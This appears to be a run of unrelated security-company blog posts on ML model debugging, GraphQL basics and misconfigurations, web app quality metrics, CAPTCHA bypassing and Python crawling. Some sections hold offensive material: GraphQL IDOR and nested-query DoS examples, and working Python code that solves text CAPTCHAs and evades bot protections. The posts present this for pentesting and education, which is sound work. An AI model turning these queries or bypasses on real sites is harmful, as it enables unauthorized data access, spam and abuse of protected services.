Neural networks

A peek into the black-box: Debugging deep neural networks for better predictions

 

Deep learning models are often criticized for being complex and opaque. They are called black-boxes because they deliver predictions and insights, but the logic behind their outputs is hard to comprehend. Due to its complex multilayer nonlinear neural networks, Data Scientists find it difficult to ascertain the factors or reasons for a certain prediction. 

This unintelligibility makes people wary of taking important decisions based on the models’ outputs. As human beings, we trust what we understand; what we can verify. And over time, this has served us well. So, being able to show how models go about solving a problem to produce insights, will help build trust, even among people with cursory knowledge of data science. 

To achieve this it is imperative to develop computational methods that can interpret, audit, and debug such models. Debugging is essential to understanding how models identify patterns and generate predictions. This will also help us identify and rectify bugs and defects.

In this article we delve into the different methods used to debug machine learning models. 

 

 

Source: interpretable-ml-book
Source: https://christophm.github.io/interpretable-ml-book/terminology.html

 

Permutation Importance

Also known as permutation feature importance, it is an algorithm that computes the sensitivity of a model to permutations/alterations in a feature’s values. In essence, feature importance evaluates each feature of your data and scores it based on its relevance or importance towards the output. While permutation feature importance, measures each feature of the data after it has been altered, and scores it based on its importance towards generating an output.

For instance, let us randomly permute or shuffle the values of a single column in the validation dataset with all the other columns intact. If the model’s accuracy drops substantially and causes an increase in error, that feature is considered “important”. On the other hand, a feature is considered ‘unimportant’ if shuffling its values doesn’t affect the model’s accuracy.

 

Debugging ML models using ELI5

ELI5 is a Python library that assists several ML frameworks and helps to easily visualize and debug black-boxes using unified API. It helps to compute permutation importance. But it should be noted that the permutation importance is only computed on test data after the model is built. 

Debugging ML models using ELI5

 

After our model is ready, we import ELI5 to calculate permutation importance.

Importing ELI5 for debugging ML models

The output for above code is shown below:

output

The features that are on top are the most important, which means that any alterations made to these values will reduce the accuracy of the model significantly. The features that are at the bottom of the list are unimportant in that any permutation made to their values will not reduce the accuracy of the model. In this example, OverallQual was the most important feature.

 

Debugging CNN-based models using Grad-CAM (Gradient-weighted Class Activation Mapping)

Grad-CAM is a technique that produces visual explanations for outputs to deliver transparent Convolutional Neural Network (CNN) based models. It examines the gradient information that flows into the final layer of the neural network to understand the output. Grad-CAM can be used for image classification, image captioning, and visual question answering. The output provided by Grad-CAM is a heatmap visualization, which is used to visually verify that your model is trained to look at the right patterns in an image.

Debugging ML models using Grad-CAM

 

Debugging ML models using Grad-CAM2

 

Debugging ML models using SHAP (SHapley Additive exPlanations)

SHAP is a game theoretic approach that aims to explain a prediction by calculating the importance of each feature towards that prediction. The SHAP library uses Shapley values at its core and explains individual predictions. Lloyd Shapley introduced the concept of Shapley in 1953 and it was later applied to the field of machine learning. 

Shapley values are derived from Game theory, where each feature in the data is a player, and the final reward is the prediction. Depending on their contribution towards the reward, Shapley values tell us how to distribute this reward fairly among the players.

We use SHAP quite often, especially for the models in which explainability is critical. The results are really quite accurate.

SHAP can explain:

  • General feature importance of the model by using all the data
  • Why a model calculates a particular score for a specific row/ record
  • The more dominant features for a segment/ group of data

Shapley values calculate the feature importance by comparing two predictions, one with the feature included and the other without it. The positive SHAP values affect the prediction/ target variable positively whereas the negative SHAP values affect the target negatively. 

Here is an example to explain the same. For this purpose, I am taking a red wine quality dataset from kaggle.

Debugging ML models using Shapley

 

Now, we produce variable importance plots, which lists the most significant variable in descending order. Wherein, the top variable would contribute more to the model.

Importing SHAP for debugging ML models

 

Mapping the plot

In the above figure, all the variables are plotted in descending order. Color of the variables represent the feature value, whether they are high (in red) or low (in blue) in that observation. A high level of the “sulphates” content has a high and positive impact on the quality rating. X-axis represents the “positive” impact. Similarly, we can say that “chlorides” is negatively correlated with the target variable.

Now, I would like to show you how SHAP values are computed in individual cases. Then, we execute such values on several observations and choose a few of the observations randomly.

Interpreting SHAP values

 

After choosing random observations, we initialize our notebook with initjs().

Explanation for some of the terms seen in the plot above: 

  1. Output value: Prediction for that observation, which in this case is 5.35
  2. Base value: Base value is the mean prediction, or mean (yhat), here it is 5.65
  3. Blue/ red: Features that can impact the prediction more are shown in red, and those that have the least impact are in blue color.

For more information and to test your skills, check out kaggle.

[Quiz] Weekly Cyber Trivia Friday #1

Cyber Trivia Friday is here!

In our first-ever cyber quiz, we want to find out if you’re up-to-date on your cybersecurity news from across the world.

If you’re behind on the news, fret not. We’ve sprinkled in some hints to help you along.

The winners will be the first 3 people to submit the quiz and get all 5 questions right.

GraphQL 101: Here’s everything you need to know about GraphQL (Part 2)

 

Read Part 1 on GraphQL here.

In last week’s blog we learnt about the basics of GraphQL and how to configure a GraphQL server. We also discussed some key differences between GraphQL and REST API. 

Here’s a brief recap:

GraphQL is an open source query language for APIs that helps to load data from a server to the client in a much simpler way. Comparing multiple aspects of both GraphQL and REST API, we have seen that GraphQL operations are superior to that of REST API. Although the benefits of this open source language is plenty, it comes with security vulnerabilities that developers tend to encounter from time to time. 

Picking up from there, in the second part, we will discuss:

  • GraphQL: Common misconfigurations that enable hackers
  • Testing common misconfigurations in GraphQL

 

GraphQL: Common misconfigurations that enable hackers

GraphQL is one of the most efficient and flexible alternatives to REST API. However, it is vulnerable to the same attacks that REST API is prone to. 

GraphQL depends on API developers to implement its schema for data validation. During this process they could inadvertently introduce errors. In addition to this, new features and functionalities, which meet client requirements, are added to web applications by the hour. This also increases the chance of developers committing errors.

Here we highlight some of the common misconfigurations and issues with GraphQL, that allow hackers to exploit it.

  • Improper Access Control or Authorization Checks

The limitations of the user authentication process can potentially grant unauthorized access to anyone. In the event that the authentication process is defective, the web application fails to restrict access to an object or resource which leads to delivering the data of another user without performing authorization checks. The flawed method allows attackers to bypass the intended access restriction, exposing user data to abuse, deletion, or alteration.

Let’s consider the scenario where a user, with the numeric object ID: 5002, wants to retrieve his/her PII such as email ID, password, name, mobile number, etc. If this user knowingly or unknowingly uses a different user ID (say, 5005), and this ID belongs to another active user, but the search leaks his/ her data, it shows that the GraphQL resolver allows unauthorized access. 

The following query consists of a user ID representing a logged in user and fetches the user’s PII:

 

query userData {

  users(id: 5002) {

    name

    email

    id

    password

    mobileNumber

    authorizationKey

    bankAccountNumber

    cvvNumber

  }

}

 

However, if the same authenticated user is able to fetch the data of ID 5005, that means there is improper access control to an object or resource. It enables hackers/ attackers to access the data of multiple users. It also allows an attacker to perform malicious activities like editing the user’s data, deleting the user from the database, etc.

 

  • Rate Limit Issue and Nested GraphQL queries leading DoS attack

In a single query, it is capable of taking multiple actions in response to multiple HTTP requests. This feature increases the complexity of GraphQL APIs, which makes it difficult for API developers to limit the number of HTTP requests. If the request is not properly handled by the resolver at the GraphQL API layer then it opens a door for actors to attack the API and to perform denial-of-service (DoS) attacks.

To avoid this, only a specific number of requests per minute should be allowed to the API, and in case the number of requests exceeds the limit, it should trigger an error or reject the response.

Let’s look at the following example of such nested queries:

 

query nestedQuery {

  allUsers {

    posts {

      follower {

        author {

          posts {

            follower {

              author {

                posts {

                  follower {

                    author {

                      posts {

                        id

                      }

                    }

                  }

                }

              }

            }

          }

        }

      }

    }

  }

}

 

  • Default introspection system reveals internal information

Some API endpoints enable server-to-server communications and are not meant for the general public. And yet, GraphQL’s feature of introspection makes this possible without much difficulty. 

Assume the instance where someone sends a query against an internal endpoint only to gain access to admin credentials and thereby obtain Admin Privilege. 

Here is an example of a single endpoint which has the potential to allow attackers to access hidden API calls from the backend. 

Hidden API calls in GraphQL

 

There are several websites such as https://apis.guru/graphql-voyager/ that display the entire list of API calls available at the backend. This provides a better understanding of the its interface and also demonstrates ways to gather sensitive information from the server. 

Entire list of GraphQL API calls

We have covered a few of the misconfigurations here, but there could be many others. Also, it is vulnerable to all bugs that affect any other API.

 

Testing common misconfigurations in GraphQL

Here we’ll be exploring two ways to test these common misconfigurations, further exploited to gain access to sensitive data or information:

  • Burp Suite – Advance intercepting proxy tool
  • Altair GraphQL – GraphQL interface available as software, extension for OS and browser.

 

Testing GraphQL misconfigurations with Burp Suite

Burp Suite is a popular pentesting framework that works as a great proxy tool to intercept and visualize requests. Assuming that readers are already aware of how to configure it, we’ll be focusing on testing alone. 

  • This is what a normal HTTP request in GraphQL looks like:Normal HTTP request on GraphQL
  • Modify the POST query per your requirements and send it to the server. 
  • If it is misconfigured, it will fetch sensitive/ internal data. 
  • However, if you find it difficult to visualize or modify the query, you can use a Burp plugin called “GraphQL” to achieve the same results.

Burp plugin for GraphQL

 

But the major drawback of testing it in Burp Suite is the inadequate visualization of the entire schema documentation. This could result in several common misconfigurations being overlooked, unless we locate the proper documentation of API endpoints or calls implemented at the backend. Another issue related to using Burp is that we have to modify or debug the query manually which makes the process more complex. All these issues can be resolved with the help of the following method.

 

Debugging GraphQL with Altair GraphQL 

Altair helps with debugging GraphQL queries and server implementations. It rectifies the problem of modifying the queries manually and instead helps to focus on other aspects. 

Altair GraphQL is available as a software for Mac, Linux, and Windows OS and also as an extension for almost all browsers. It provides proper documentation of the entire schema that is available at the backend. All we need to do is configure the web application we are testing.

Three operations of GraphQL

 

All three operations of GraphQL can be seen in the documentation section as shown above. You can further explore these options to get other fields, API endpoints, etc.

Adding supported values

 

Altair is capable of solving one of the most challenging tasks in this process: Adding a query manually. It comes with the feature that enables automatic query generation. So, all we need to do is pass supported type values.

Add Query

 

  • Click on the ADD QUERY as shown above, to automatically add a query along with its arguments and fields. 
  • Now, provide the argument values to test for any bugs or misconfigurations.

Altair GraphQL

 

Altair makes bug hunting on any web application quite easy. You can test GraphQL queries and server implementations easily, as Altair performs the complex part of the process and lets you focus on the results.

 

Conclusion

In comparison with REST API, GraphQL offers developers improved standards of API development. And yet, it has its own security misconfigurations that can be exploited relatively easily. However, it is capable of bridging the gaps created by REST API. Alternatively, REST can help address the drawbacks of GraphQL as well. They need not be referred to as two incompatible technologies. Moreover, we believe these technologies can coexist with each other.

GraphQL 101: Here’s everything you need to know about GraphQL

 

API or an Application Program Interface is a family of protocols, commands, and functions that are used to build and integrate application software. In essence, API is the intermediary that enables two applications to connect. And for years, REST API was recognized as the standard protocol for web APIs. However, there is a visible trend that could potentially upend this inclination towards REST API. The State of Javascript 2018 report finds that, out of the developers who were surveyed in 2016, only 5% used GraphQL. Whereas in 2018, the numbers rapidly increased to a massive 20.4%. Although these numbers do not represent the preference of GraphQL over REST API, this clearly indicates the significant growth in the number of developers who opt for GraphQL in web applications. 

In a two-part series about GraphQL, we discuss the following topics:

  • Introduction to GraphQL 
  • GraphQL vs. REST
  • GraphQL’s declarative data fetching
  • GraphQL: Common misconfigurations that enable hackers
  • Testing common misconfigurations in GraphQL

In this part, we explore:

  • What is GraphQL?
  • How to identify a GraphQL instance?
  • How to configure the GraphQL server?
  • Root types of GraphQL schema
  • GraphQL vs. REST (focused on data fetching)
  • GraphQL: Smooth, declarative data fetching

 

Introduction to GraphQL

What is GraphQL?

It is an open source query language for APIs that helps to load data from a server to the client in a much simpler way. Unlike REST APIs, GraphQL APIs are arranged as types and fields and not as endpoints. This feature ensures that applications can request for only what can be obtained to provide clear responses. GraphQL API fetches the exact data requested; nothing less, nothing more.

It was developed by Facebook in 2012 and was later publicly released in 2015. Today, GraphQL is rapidly adopted by clients, big and small, from all over the world. Prominent websites and mobile apps such as Facebook, Twitter, GitHub, Pinterest, Airbnb, etc. use GraphQL.

REST API suffers from the lack of a robust API documentation making it difficult for developers to know the specific operations that the API supports and how to use them efficiently. But the GraphQL schema properly defines its operations, input values, and possible outcomes. When a client sends a query request, GraphQL’s resolver function fetches the result from the source.

GraphQL resolver

GraphQL allows frontend developers to retrieve data from the backend with unparalleled ease, which explains why it is generally described as Frontend Directed API technology. Evidently, it is more efficient, powerful, and flexible, and is a better alternative to REST API. 

 

How to identify a GraphQL instance?

  • A GraphQL HTTP request is typically sent to the following endpoints:
    • /graphql
    • /graphql/console
    • /graphiql
  • The GraphQL request looks similar to JSON but it’s different, as seen in the following request:

JSONWhile pentesting a web application, if you come across any of the above-mentioned attributes, then it most probably uses GraphQL.

 

How to configure the GraphQL server?

We can run the GraphQL API server on localhost with the use of Express, a web application framework for Node.js. 

  • For this, after you have installed “npm” proceed to install two additional dependencies which can be done using the following command:
npm install express express-graphql graphql --save
  • For more clarity of the concept, this is how we fetch “hello world” data from the GraphQL server using a query. 

 

var express = require('express');

var graphqlHTTP = require('express-graphql');


var { buildSchema } = require('graphql');

// Construct a schema, using GraphQL schema language

var schema = buildSchema(`

  type Query {

    hello: String

  }

`);

// The root provides a resolver function for each API endpoint

var root = {

  hello: () => {

    return 'Hello world!';

  },

};

var app = express();

app.use('/graphql', graphqlHTTP({

  schema: schema,

  rootValue: root,

  graphiql: true,

}));

app.listen(4000);

console.log('Running a GraphQL API server at http://localhost:4000/graphql');
  • Save the subsequent code as GraphQL_Server.js.
  • Now, run this GraphQL server with: 
node GraphQL_Server.js
  • If you don’t encounter an error, that means we have successfully configured our GraphQL server and we are good to proceed.Configuring GraphQL
  • Navigate to the endpoint http://locahost:4000/graphql in a web browser where you will come across the GraphQL interface. You can now enter your queries here. Entering a query in GraphQL
  • Once the query “hello” is issued, it fetches the following data from the server:

Hello World on GraphQL

Root types of GraphQL schema

GraphQL schema has three root types. Requests against GraphQL endpoint should start with any of these root types while communicating with the server:

  • Query: This type allows reading or fetching data from the backend server.GraphQL query
  • Mutation: This type is used to create, edit, or delete data. GraphQL Monitoring
  • Subscriptions: This root type enables real-time communication, to automatically receive real-time updates about particular events.

GraphQL Subscription

GraphQL is said to be client-driven, as it allows clients to add new fields and types to the GraphQL API and provide each field with functions. Clients can ultimately decide the exact response they require for queries. Contrary to how REST API operates, GraphQL permits clients to retrieve essential data alone, instead of the complete data.

 

GraphQL vs. REST

Both REST and GraphQL help developers design the functioning of APIs, and the process by which applications will be able to access data from it. They send data over HTTP. However, there are quite a few differences between them which prove that GraphQL is superior. 

A key differentiator is a method of fetching data from the backend server. While a typical REST API sends multiple requests to load data from multiple URLs, GraphQL has to send only a single request, to get the most accurate response, leaving out unwanted data behind. This is called declarative data fetching. Here’s an example to help you understand this better.

In REST API, multiple requests are sent at multiple endpoints to fetch the specific or particular data from the server. For instance, in order to fetch a user’s ID, his posts on a social media platform, and his followers on the same channel, we have to send multiple requests at the endpoint using the right path such as /user/<id>, /users/id/<posts>, and /users/id/<followers>  respectively, only to get multiple responses regarding the same.

REST API multiple endpoints

 

However, in the case of GraphQL, a single query, that includes all three requests, at a single endpoint will be enough to retrieve accurate responses to the corresponding requests. All we need to do is send a query through the interface, which gets interpreted against the entire schema, and returns the exact data that the client requested.

 

Smooth, declarative data fetching

In the instance of REST API mentioned above, we saw that 3 requests were made at 3 different endpoints to retrieve the corresponding response from the server. But in GraphQL, this process is relatively easier. A query that includes the exact data requirements like IDs, posts, and followers at a single endpoint would do the job. 

Let’s have a look at the query that is sent to the server to fetch a user’s ID, posts, and followers:

GraphQL endpoint

The above image shows how a query that includes data requirements is sent to the backend server, for which it’s response is retrieved at the client-side. 

The dissimilarities between REST and GraphQL is quite significant and can be understood while comparing their functioning. 

Difference between GraphQL and REST API

 

However, these differences do not necessarily mean that REST is not as efficient or flexible, after all it has been the standard API for several years now. However, GraphQL is gaining popularity because it addresses and bridges the shortcomings of REST API. 

In next week’s blog, we will explore the common GraphQL misconfigurations that enable hackers, and how you can test them. 

web-application-testing

6 major quality metrics that will optimize your web app

 

As more businesses migrate to cloud environments, making it easier for customers to access their services/ products, we have witnessed a sharp rise in the number of online businesses employing web applications. Also known as web apps, they have assumed great significance in this digital era, allowing businesses to develop and achieve their objectives, expeditiously.

Well designed web apps allow organizations to gain competitive advantage and appeal to more customers. Hence, it is essential to have measurable or quantifiable metrics to gauge the quality of a web app.

 

What is a web application?

Web apps are software programs that require a web browser for interaction. And unlike other applications, users need not install the software to run web applications; all they require is a web browser. Web applications include everything from small-scale online games to video streaming applications like Netflix.

 

 What are Software Quality Metrics?

Software quality metrics gauge the quality of the software, its development and maintenance, and the execution of the project itself. In essence, software quality metrics record not only the number of defects or security flaws in the software, but also the entire process of development of the project, as well as the product.  

 

Classification of Quality Metrics

Based on the components and features, software quality metrics can be classified into:

  • Product quality metrics
  • In-process quality metrics
  • Project quality metrics

A user grades the quality of an application based on their experience with its features/functionalities, the value it provides, and after-sales services such as maintenance, upgrades, etc. However, the quality of the software is also measured based on the project, the teams involved, project cost, etc.  

 

Six major quality metrics to consider for better web applications

 

  1. Usability of the web application:

Usability testing assesses the ease with which end-users consume the application. It ensures effective interaction between the user and the app. Web applications that have a complicated design or interface, are least prefered by users.

In order to test the usability of web apps, its navigation, content, and other user-facing features should be tested.

For example:

  • Images and other non-text content should be placed appropriately, so as to avoid distractions.
  • The options “Search” and “Contact us” should be easy to find. 

 

  1. Performance of the web application:

Performance testing determines the behaviour of the application under different settings and configurations. For example: Performance during high usage vs normal usage. Performance of a web app contributes to its adoption, continued usage, and overall success.  

Types of performance testing

  • Load testing
  • Web stress testing

In load testing, we evaluate the performance of the web app when multiple users access it concurrently. This helps to ascertain if the app can sustain peak hours, handle large user requests or simultaneous database access requests, etc.

In web stress testing, the system is tested beyond the limits of standard conditions.  The objective of web stress testing is to assess the behaviour of the app during volatile conditions such as when web pages time out or a delay between requests and responses, and how it recovers from crashes.

 

  1. Compatibility on different platforms and browsers:

The quality of the software also depends on whether the application is compatible with different browsers, hardware, operating systems, applications, network environments, and devices.

For instance,

  • If developers intend to have a mobile version of a web application, they ought to address and resolve any issues that may arise in that scenario.
  • While performing various actions such as printing or downloading, from a web application, the elements on the page, including text, images, etc., should be fixed in place, and properly aligned to fit on the page. 

 

  1. Requirements Traceability:

This parameter traces and maps user requirements throughout its life (from its source, through stages of its development and deployment), using test cases. It checks whether every user requirement is met and defines the purpose of each requirement and the factors they depend on.

 

Modes of requirement traceability

Based on the direction of tracing, requirement traceability can be classified into:

  • Forward traceability: Tracing the requirement sources to the resulting requirement, to ensure coherence.
  • Backward traceability: Tracing the various components of design or implementation back to its source, to verify that requirements are updated.
  • Bidirectional traceability: Tracing both backward and forward.

 

  1. Reliability:

A web application is not reliable if it does not produce consistent results. In an ideal situation, the application must operate failure-free, for a specified period of time, in a particular environment.

For example, a medical thermometer is only reliable if it measures the accurate temperature every time it is used.

 

  1. Security testing for the web application:

The security implementations of a web application is another factor that determines its success.  As a study shows, hackers can attack users in 9 out of 10 web applications. These attacks include redirecting users to a malicious site, stealing credentials, and spreading malware. So, ignoring this factor could cause serious damage to users and their businesses.

For example,

  • To test the security of web applications, we test URLs that a user can and cannot access. If an online document has an ID/ identifier such as ID=”456″ or identifier=”zm9vdC0xNl8yMDE5…” at the end of its URL, the user should only be able to access that document. In the event that the user tries to change the ID/ identifier, they should receive an appropriate error message upon altering the URL.
  • Automatic traffic can be prevented by using CAPTCHA.

Types of security testing

  • Dynamic Application Security Testing (DAST): It detects indicators of security vulnerabilities in applications that are running.
  • Static Application Security Testing (SAST): It analyzes the application source code, and/ or compiled versions of code that are indicative of security vulnerabilities.
  • Application Penetration Testing: It assesses how applications defend against possible attacks.

 

Additional components to be considered

To ensure that the web application is fully functional in all aspects, the following components should be inspected:

Links

  • Internal links
  •  Outgoing links
  •  Links that direct users to another section on the same page
  • Orphan pages in web applications
  • Broken links

Forms or other input fields

  • Verify all validations
  • Check default values
  • Wrong input
  • Links to update forms, edit forms, delete forms, etc. (if any)

Database 

  • Review data integrity while editing, deleting, and updating forms
  • Check if data is being retrieved and updated correctly

Cookies 

  • Check whether the cookies are encrypted or not
  • Evaluate application behavior after deleting cookies

How to bypass CAPTCHAs easily using Python and other methods

 

Internet service providers generally face the risk of authentication-related attacks, spam, Denial-of-Service attacks, and data mining bots. Completely Automated Public Turing test, to tell Computers and Humans apart, popularly known as CAPTCHA, is a challenge-response test created to selectively restrict access to computer systems. As a type of Human Interaction Proof, or a human authentication mechanism, CAPTCHA generates challenges to identify users. In essence, a CAPTCHA test can tell machines/ computers and humans apart. This has caused a heightened adoption of CAPTCHAs across various online businesses and services.

The concept of CAPTCHA depends on human sensory and cognitive skills. These skills enable humans to read a distorted text image or choose specific images from several different images. Generally, computers and computer programs such as bots are not capable of interpreting a CAPTCHA as they generate distorted images with text or numbers, which most Optical Character Recognition (OCR) technologies fail to make sense of. However, with the help of Artificial Intelligence, algorithms are getting smarter and bots are now capable of cracking these tests. For instance, there are bots that are capable of solving a text CAPTCHA through letter segmentation mechanisms. That said, there aren’t a lot of automated CAPTCHA solving algorithms available. 

This article outlines the various methods of generating and verifying CAPTCHAs, their application, and multiple ways to bypass CAPTCHAs.

 

Reasons for using CAPTCHA

Web developers deploy CAPTCHAs on websites to ensure that they are protected against bots. CAPTCHAs are generally used to prevent:

  • Bots from registering for services such as free email.
  • Scraper bots from gathering your credentials or personal information, upon logging in or while making online payments.
  • Bots from submitting online responses.
  • Brute-force bot attacks.
  • Search engine bots from indexing pages with personal/ sensitive information.

 

General flow of CAPTCHA generation and verification

The image below represents the common method of generating and verifying CAPTCHAs:

Form Submission

Application of different types of CAPTCHA and how to bypass them

 

I. reCAPTCHA and the protection of websites

recaptcha

Google reCAPTCHA is a free service offered to prevent spam and abuse of websites. It uses advanced risk analysis techniques and allows only valid users to proceed. 

Process flow diagram of Google reCAPTCHA
Process flow diagram of Google reCAPTCHA

 

How to bypass reCAPTCHA?

Verification using browser extensions

Browser extensions such as Buster help solve CAPTCHA verification challenges. Buster, for instance, uses speech recognition software to bypass reCAPTCHA audio challenges. reCAPTCHA allows users to download audio files. Once it is downloaded, Google’s own Speech Recognition API can be used to solve the audio challenge.

CAPTCHA solving services

Online CAPTCHA solving services offer human based services. Such services involve actual human beings hired to solve CAPTCHAs. 

 

II. Real person CAPTCHA and automated form submissions

The jQuery real person CAPTCHA plugin prevents automated form submissions by bots. These plugins offer text-based CAPTCHAs in a dotted font. This solves the problem of fake form submissions. 

 

text in dotted font

 

How to bypass real person CAPTCHA?

The following steps can be used to solve real person CAPTCHAs:

A. Create data set

In this one-time process:

  1. Collect texts from real person HTML tags
  2. Group the texts based on the words
  3. Create data set model for A-Z words (training data)
B. Testing to predict the solutions

After successfully completing process A, set up a process to:

  1. Collect texts from real person HTML tags
  2. Group the texts based on the words
  3. Fetch the word from the data set model created in process A.

 

Example: 



from selenium import webdriver
import time


dataset = {'     *       *      *      *      *      ******* ': 'J',
           '*******      *      *      *      *      *      *': 'L',
           '********  *  **  *  **  *  **  *  **  *  * ** ** ': 'B',
           '*       *       *       ****  *     *     *      ': 'Y',
           '*      *      *      ********      *      *      ': 'T',
           ' ***** *     **     **     **     **     * *   * ': 'C',
           '********  *  **  *  **  *  **     **     **     *': 'E',
           '********     **     **     **     **     * ***** ': 'D',
           '*     **     **     *********     **     **     *': 'I',
           ' ***** *     **     **     **     **     * ***** ': 'O',
           '******* *       *       *     *     *     *******': 'M',
           '******* *       *       *       *       * *******': 'N',
           '********  *   *  *   *  *   *      *      *      ': 'F',
           ' **  * *  *  **  *  **  *  **  *  **  *  * *  ** ': 'S',
           ' ***** *     **     **     **   * **    *  **** *': 'Q',
           '*******   *     * *    * *   *   *  *   * *     *': 'K',
           '     **   **   ** *  *   *   ** *     **       **': 'A',
           '******       *      *      *      *      ******* ': 'U',
           '*******   *      *      *      *      *   *******': 'H',
           '**       **       **       *    **   **   **     ': 'V',
           '*     **    ***   * **  *  ** *   ***    **     *': 'Z',
           '********  *   *  *   *  *   *  *   *  *    **    ': 'P',
           '*     * *   *   * *     *     * *   *   * *     *': 'X',
           ' ***** *     **     **     **   * **   * * *  ** ': 'G',
           '********  *   *  *   *  *   *  **  *  * *  **   *': 'R',
           '*******     *     *     *       *       * *******': 'W'}


def group_captcha_string(word_pos):
    captcha_string = ''
    for i in range(len(word_pos[0])):
        temp_list = []
        temp_string = ''

        for j in range(len(word_pos)):
            val = word_pos[j][i]
            temp_string += val

            if val.strip():
                temp_list.append(val)

        if temp_list:
            captcha_string += temp_string
        else:
            captcha_string += 'sp'

    return captcha_string.split("spsp")


# create client
client = webdriver.Chrome()
client.get("http://keith-wood.name/realPerson.html")
time.sleep(3)

# indexing text
_get = lambda _in: {index: val for index, val in enumerate(_in)}

# get text from html tag
captcha = client.find_element_by_css_selector('form [class="realperson-text"]').text.split('\n')

word_pos = list(map(_get, captcha))

# group text
text = group_captcha_string(word_pos)

# get text(test)
captcha_text = ''.join(list(map(lambda x: dataset[x] if x else '', text)))
print("captcha:", captcha_text)

III. Text-in-image CAPTCHA

Text-based/ text-in-image CAPTCHAs are the most commonly deployed kind and they use distorted text rendered in an image. There are two types of text-based CAPTCHAs:

 

Simple CAPTCHA

Simple CAPTCHAs can be bypassed using the Optical Character Recognition (OCR) technology that recognizes the text inside images, such as scanned documents and photographs. This technology converts images containing written text into machine-readable text data.

simple

Example:



import pytesseract
import sys
import argparse
try:
    import Image
except ImportError:
    from PIL import Image
from subprocess import check_output


def resolve(path):
    print("Resampling the Image")
    check_output(['convert', path, '-resample', '600', path])
    return pytesseract.image_to_string(Image.open(path))


if __name__=="__main__":
    argparser = argparse.ArgumentParser()
    argparser.add_argument('path', help = 'Captcha file path')
    args = argparser.parse_args()
    path = args.path
    print('Resolving Captcha')
    captcha_text = resolve(path)
    print('Extracted Text', captcha_text)



# command to run script
python3 captcha_resolver.py cap.jpg

 

Complicated CAPTCHA

These text-in-image CAPTCHAs are too complex to be solved using the OCR technology. Instead the following measures can be considered:

  • Build machine learning models such as Convolutional Neural Network (CNN) or Recurrent Neural Network (RNN)
  • Resort to CAPTCHA solving services

 

 

IV. Sum of integers or logical operations

This unique challenge involves solving mathematical problems, particularly, finding the sum of integers.

logical captcha

To bypass this challenge, one can:

  1. Extract text from HTML tags or images
  2. Identify the operator
  3. Perform the logic
  4. Get the result

 

V. Mitigating DDoS attacks using CAPTCHAs

In distributed denial-of-service attacks, cyber criminals target network resources and render them inaccessible to users. These attacks temporarily or indefinitely slows down the target resource by flooding the target with incoming traffic from several hosts. To prevent such attacks, businesses use CAPTCHAs. 

DDoS

The following methods or programs can be used to bypass DDoS protected sites:

  1. JavaScript supported browsers (Chrome/ Firefox)
  2. Deriving logic to generate DDoS answers
  3. Fetch the DDoS problem on the site and execute it using node.js
crawling

How are Python modules used for web crawling?

 

Let us assume search engines, like Google, never existed! How would you find what you need from across 4.2 billion web pages? Web crawlers are programs written to browse the internet, to gather information, index and parse the collected data, to facilitate quick searches. Crawlers are, thus, a smart solution to big data sets and a catalyst to major advancements in the field of cyber security.

In this article, we will learn:

  1. What is crawling?
  2. Applications of crawling
  3. Python modules used for crawling
  4. Use-case: Fetching downloadable URLs from YouTube using crawlers
  5. How do CloudSEK Crawlers work?

web crawler

What is crawling?

Crawling refers to the process of scraping/ extracting data from websites/ the internet using web crawlers. For instance, Google uses spider bots (crawlers) to read the content of billions of web pages and posts. Then, it gathers data from these sites and arranges them in the Google Search index.

Basic stages of crawling: 
  1. Scrape data from the source
  2. Parse the collected data
  3. Clean the data of any noise or duplicate entries
  4. Structure the data as per requirement

 

Applications of crawling

Organizations crawl and scrape data off of web pages for various reasons that may benefit them or their customers. Here are some lesser known applications of crawling: 

  • Comparing data for market analysis
  • Monitoring data leaks
  • Preparing data sets for Machine Learning algorithms
  • Fact-checking information on social media

 

Python modules used for crawling

  • Requests – Allow you to send HTTP requests to web pages
  • Beautifulsoup – Python library that retrieves data from HTML and XML files, and parses its elements to the required format
  • Selenium – Open source testing suite used for web applications. It also performs browser actions to retrieve data.

 

Use-case: Fetching downloadable URLs from YouTube using crawlers

A single YouTube video may have several downloadable URLs, based on: its content, resolution, bitrate, range and VR/3D. Here is a sample API and CLI code to get downloadable URLs on YouTube along with their Itags:

 

Project structure 

youtube
|
|---- app.py
|---- cli.py
`---- core.py

The project will contain three files:

app.py: For the api interface, using flask micro framework

cli.py: For command line interface, using argparse module

core.py: Contains all the core (common) functionalities which act as helper functions for app.py and cli.py.

# youtube/app.py
import flask
from flask import jsonify, request
import core
app = flask.Flask(__name__)
app.config["DEBUG"] = True
@app.route('/', methods=['GET'])
def get_downloadable_urls():
if 'url' not in request.args:
return "Error: No url field provided. Please specify an youtube url."
url = request.args['url']
urls = core.get_downloadable_urls(url)
return jsonify(urls)
app.run()

The flask interface code to get downloadable URLs through API.

Request url - localhost:<port>/?url=https://www.youtube.com/watch?v=FIVPlraNgXs

# youtube/cli.py
import argparse
import core
my_parser = argparse.ArgumentParser(description='Get youtube downloadable video from url')
my_parser.add_argument('-u', '--url', metavar='', required=True, help='youtube url')
args = my_parser.parse_args()
urls = core.get_downloadable_urls(args.url)
print(f'Got {len(urls)} urls\n')
for index, url in enumerate(urls, start=1):
print(f'{index}. {url}\n')

Code snippet to get downlodable urls through comand line interface (using argparse to parse command like arguments)

Command line interface - python cli.py -u 'https://www.youtube.com/watch?v=aWPYw7iVBg0'

# youtube/core.py
import json
import re
import requests
def get_downloadable_urls(url):
html = requests.get(url).text
RE = re.compile(r'ytplayer[.]config\s*=\s*(\{.*?\});')
conf = json.loads(RE.search(html).group(1))
player_response = json.loads(conf['args']['player_response'])
data = player_response['streamingData']
return [{'itag': frmt['itag'],'url': frmt['url']} for frmt in data['adaptiveFormats']]

This is the core (common) function for both API and CLI interface. 

The execution of these commands will:

  1. Take YouTube url as an argument
  2. Gather page source using the Requests module
  3. Parse it and get streaming data
  4. Return response objects: url and itag

How to use these URLs?

  • Build your own YouTube downloader (web app)
  • Build an API to download YouTube video

Sample result 

[{
'itag': 251,
